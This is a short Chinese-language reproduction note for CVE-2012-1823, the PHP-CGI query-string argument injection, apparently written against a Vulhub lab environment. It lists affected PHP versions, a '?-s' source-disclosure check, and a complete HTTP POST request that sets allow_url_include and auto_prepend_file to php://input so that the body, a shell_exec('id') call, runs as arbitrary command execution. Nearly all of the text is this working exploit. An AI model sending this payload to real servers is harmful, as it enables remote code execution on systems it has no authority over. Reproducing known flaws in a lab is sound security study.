漏洞详细
详细务必请看:https://vulhub.org/#/environments/php/CVE-2012-1823/
影响版本
php < 5.3.12 or php < 5.4.2
漏洞复现
访问http://your-ip:8080/index.php?-s
即爆出源码,说明漏洞存在,我们可以发送以下数据包来执行任意命令:
POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: your_ip
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
<?php echo shell_exec("id"); ?>